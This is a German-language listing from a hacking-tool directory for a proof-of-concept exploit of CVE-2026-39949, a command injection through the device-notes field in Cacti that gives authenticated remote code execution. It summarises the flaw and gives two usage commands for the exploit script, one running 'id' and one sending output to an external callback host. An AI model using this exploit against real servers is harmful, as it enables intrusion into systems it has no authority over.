Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-39949 — Cacti ≤ 1.2.30 Auth RCE – Host-Variablen-Injection | Kitploit
Tools/GitHubGitHub/lukehebe/cve-2026-39949
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHublukehebe/cve-2026-39949

CVE-2026-39949

Cacti ≤ 1.2.30 Auth RCE – Host-Variablen-Injection

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-39949: Authentifizierte Remote-Codeausführung in Cacti durch Host-Variable-Injection

Zusammenfassung

Eine OS-Befehlsinjektions-Schwachstelle in Cacti ≤ 1.2.30 ermöglicht jedem authentifizierten Benutzer mit Berechtigungen zur Erstellung von Geräten und Graphenvorlagen, beliebige Befehle auf dem zugrunde liegenden Server auszuführen. Der Fehler besteht darin, dass benutzergesteuerte Host-Metadatenfelder (insbesondere das Feld für Gerätenotizen) über die Variablenersetzungs-Engine von Cacti in RRDtool-Befehlszeilenargumente eingesetzt werden, ohne jegliche Bereinigung oder Escaping. Ein Angreifer kann Shell-Metazeichen in das Notizenfeld injizieren, eine Graphenvorlage erstellen, die auf die Variable |host_notes| verweist, und die Graphenerstellung auslösen, um eine vollständige Remote-Codeausführung als Web-Server-Benutzer zu erreichen.

Verwendung:

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'

OOB-Befehlsausführung:

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com
image image image
Tool herunterladen